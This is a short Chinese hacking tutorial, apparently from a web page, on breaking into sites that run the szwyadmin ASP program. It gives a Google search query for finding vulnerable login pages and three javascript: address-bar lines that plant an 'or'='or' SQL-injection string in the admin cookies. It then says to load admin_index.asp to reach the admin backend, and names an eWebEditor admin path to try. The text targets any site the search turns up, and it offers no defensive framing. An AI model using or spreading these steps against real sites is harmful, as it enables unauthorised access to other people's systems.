szwyadmin程序漏洞拿shell
先我们在Google中搜索关键词
关键字:inurl:szwyadmin/login.asp
任意打开一个搜索结果,打开登录界面后在地址栏中输入下面的代码:
代码:javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));
javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));
javascript:alert(document.cookie="admindj="+escape("1"));
关闭此页面
在次打开登录界面
在地址栏中将login.asp改为admin_index.asp
就直接进入后台了
另外还可以试试
ewebeditor/admin_login.asp
下一篇:无忧购物系统ASP专业版注入漏洞